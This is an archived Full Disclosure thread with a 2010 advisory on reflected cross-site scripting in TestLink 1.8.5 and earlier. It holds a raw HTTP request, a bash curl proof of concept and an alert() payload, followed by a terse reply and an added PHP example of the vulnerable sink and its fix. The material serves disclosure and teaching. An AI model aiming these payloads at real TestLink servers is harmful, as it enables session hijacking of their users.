Full Disclosure mailing list archives
Re: Cross site scripting Vulnerabilities in Testlink TestManagement and Execution System
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sat, 16 Jan 2010 00:03:13 +1100
Prashant,

Usually we do not mention the engineer's/dev's names in a timeline; that's totally a jackass move. Anyone civilized would mention, in this case: "{DATE} <VENDOR NAME> says <CRAP>".

Btw, posting an "exploit" to trigger a JS alert is priceless; dude, you made my night.

2010/1/15 Prashant <clickprashant () rediffmail com>
1. Title: Cross site scripting Vulnerabilities in Testlink TestManagement and Execution System.
Discovered by: Prashant Khandelwal (clickprashant () gmail com)

2. Vulnerability Information
Class: Cross site scripting
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No

3. Vulnerable packages
Versions affected: All versions <= Testlink 1.8.5
Download: http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc

4. Vulnerability Description
A cross site scripting vulnerability has been found in Testlink (http://www.teamst.org/), a popular and acclaimed free, open source test management tool written in PHP. The issue discovered can only be exploited with an authenticated session. This cross site scripting vulnerability is present in the file /testlink/lib/usermanagement/usersView.php and can be exploited by setting the variable "order_by_login_dir" as below with an HTTP POST request.

Example HTTP request (tested on 1.8.5)
Set the POST variable order_by_login_dir to >">alert(726367128870)%3B

Request
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login

5. Proof Of Concept
======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant () gmail com]
# Cross site scripting in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 ( http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc )
# Vulnerability Discovered: 5-Jan-2010
# This POC is for educational purpose and has only been tested with testlink 1.8.5

if [ $# -ne 3 ]
then
  echo "Usage - $0 User password Testlink_root_dir_URI"
  echo "Example - $0 admin admin http://Testlink-Server/testlink"
  exit 1
fi

# Start from a clean state: old session cookies and a previous capture would confuse the result
rm -rf cookies userView.php

# Step 1: authenticate and store the PHPSESSID cookie (the bug needs a logged-in session)
curl -d "tl_login=$1&tl_password=$2" "$3/login.php" -c cookies

# Step 2: replay the session cookie and POST the payload in order_by_login_dir;
# the reflected response page is saved for inspection
curl -d 'operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login' "$3/lib/usermanagement/usersView.php" -b cookies -v > userView.php

echo "Please open userView.php in a browser; a JavaScript alert with text 123456789 should pop up"
=====================

6. Report Timeline
I) 5-Jan-2010 Vulnerability discovered
II) 11-Jan-2010 Notified the developers Francisco Mancardi and Martin Havlat from the testlink team about the vulnerability
IV) 11-Jan-2010 Francisco Mancardi asks for a POC.
V) 14-Jan-2010 POCs given
VI) 15-Jan-2010 Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not committed to any timeline for fixing them.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
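The advisory above describes the sink only by its request shape (a sort-direction parameter reflected back by usersView.php), and the archived payload has had its tags stripped. The following is an added illustration, written for this page and not taken from TestLink's source: it assumes a minimal rendering routine that interpolates order_by_login_dir into a column-header link, shows why a value such as `1"><script>...</script>` breaks out of the attribute, and places the usual fix beside it (allow-list the parameter to asc/desc, then HTML-escape at the output point). The function names, the reconstructed markup and the sample POST body are all assumptions.

```php
<?php
// Added illustration, not TestLink's code. The POST field names follow the
// advisory; the rendering below is an assumed minimal reconstruction of the
// kind of code that produces a reflected XSS in a sort-direction parameter.

function render_header_vulnerable(array $post): string
{
    $dir = $post['order_by_login_dir'] ?? 'asc';
    // Unescaped interpolation into an attribute value: a value like
    // 1"><script>alert(1);</script> closes the quoted attribute and injects markup.
    return '<a href="usersView.php?order_by_login_dir=' . $dir . '">Login</a>';
}

function normalize_sort_dir(string $raw): string
{
    // Allow-list: the only two values a sort direction can legitimately take.
    // Anything else (including the payload) collapses to the default.
    return in_array($raw, ['asc', 'desc'], true) ? $raw : 'asc';
}

function render_header_hardened(array $post): string
{
    $dir = normalize_sort_dir((string) ($post['order_by_login_dir'] ?? 'asc'));
    // Escape at the output point as well, so a later change to the allow-list
    // (for example adding a value with quotes) cannot silently reopen the sink.
    return '<a href="usersView.php?order_by_login_dir='
        . htmlspecialchars($dir, ENT_QUOTES, 'UTF-8') . '">Login</a>';
}

// Simple reflection check a tester can reuse: did the injected tag survive verbatim?
function payload_reflected(string $html, string $needle): bool
{
    return strpos($html, $needle) !== false;
}

// Constructed request body mirroring the advisory's PoC. The <script> tags are
// an assumption: the archived advisory shows only the alert() call.
$post = [
    'operation'          => 'order_by_role',
    'order_by_role_dir'  => 'asc',
    'order_by_login_dir' => '1"><script>alert(123456789);</script>',
    'user_order_by'      => 'order_by_login',
];

echo "vulnerable: " . render_header_vulnerable($post) . PHP_EOL;
echo "hardened:   " . render_header_hardened($post) . PHP_EOL;
var_dump(payload_reflected(render_header_vulnerable($post), '<script>'));
var_dump(payload_reflected(render_header_hardened($post), '<script>'));
```

Run it with `php example.php`: the vulnerable line carries the script tag into the page, while the hardened line renders `order_by_login_dir=asc`. The allow-list is the real fix here (a sort direction has exactly two valid values, so there is no reason to carry user input through to the page at all); the escaping is a second layer for the day someone widens the allow-list.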
Current thread:
- Cross site scripting Vulnerabilities in Testlink TestManagement and Execution System Prashant (Jan 15)
- Re: Cross site scripting Vulnerabilities in Testlink TestManagement and Execution System Jeff Williams (Jan 15)